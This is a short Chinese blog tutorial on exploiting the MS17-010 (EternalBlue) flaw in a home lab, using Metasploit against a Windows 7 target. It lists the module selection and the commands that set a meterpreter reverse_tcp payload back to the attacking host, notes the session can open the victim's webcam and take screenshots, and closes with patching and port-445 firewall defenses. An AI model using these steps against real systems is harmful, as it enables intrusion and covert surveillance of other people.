ms17010漏洞的简单利用

2019-12-29 本文已影响0人小田Ali

（第一次在简书发表文章，没啥经验，分享一些学习经验。大佬们多多包涵，也希望大家能够指出我的错误。）

漏洞简单介绍：2017年爆发的”永恒之蓝“病毒，正是利用这个漏洞。尽管微软公司很早就打出了补丁，可是很多人不以为然，才会让勒索病毒肆意传播。也导致了btc严重涨价……

一、实验环境

靶机：windows7 x64 IP：192.168.1.5

攻击机：Kali Rolling (2019.3) x64 IP：192.168.1.3

两台主机在同一网段内；win7关闭防火墙并且开启445端口。

1、使用ipconfig/ifconfig分别查看win7和kali的ip。

2、打开msf工具

每次开启都会有不同的界面

3、使用search命令搜索ms17_010

4、选择模块和设置条件

使用use来选择第三个模块，可以直接 use 2，也可以打全

然后用set来设置靶机IP $\lceil$ set rhost 192.168.1.5 $\rfloor$

设置本机IP $\lceil$ set lhost 192.168.1.3 $\rfloor$

设置监听端口 $\lceil$ set lport 8888 $\rfloor$ 不设置则默认4444端口

设置payload $\lceil$ set payload windows/x64/meterpreter/reverse_tcp $\rfloor$

还有另外一个payload能用于本实验，具体可以 $\lceil$ show payloads $\rfloor$ 查看

最后，可以使用show options检查所有信息

5、开始渗透 run

稍等片刻看到win则成功创建会话

6、成功之后，可以开启Windows7的摄像头，截图等等

具体可以用help查看

1、关闭445端口

2、打开防火墙，安装安全软件

3、安装对应补丁，这里就不放链接了

关闭445端口的方法：

1）打开控制面板----Windows防火墙----高级设置

2）点击新建规则，设置端口号的规则并且命名（如图）

msf工具虽然强大，但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理，理解如何使用漏洞，甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。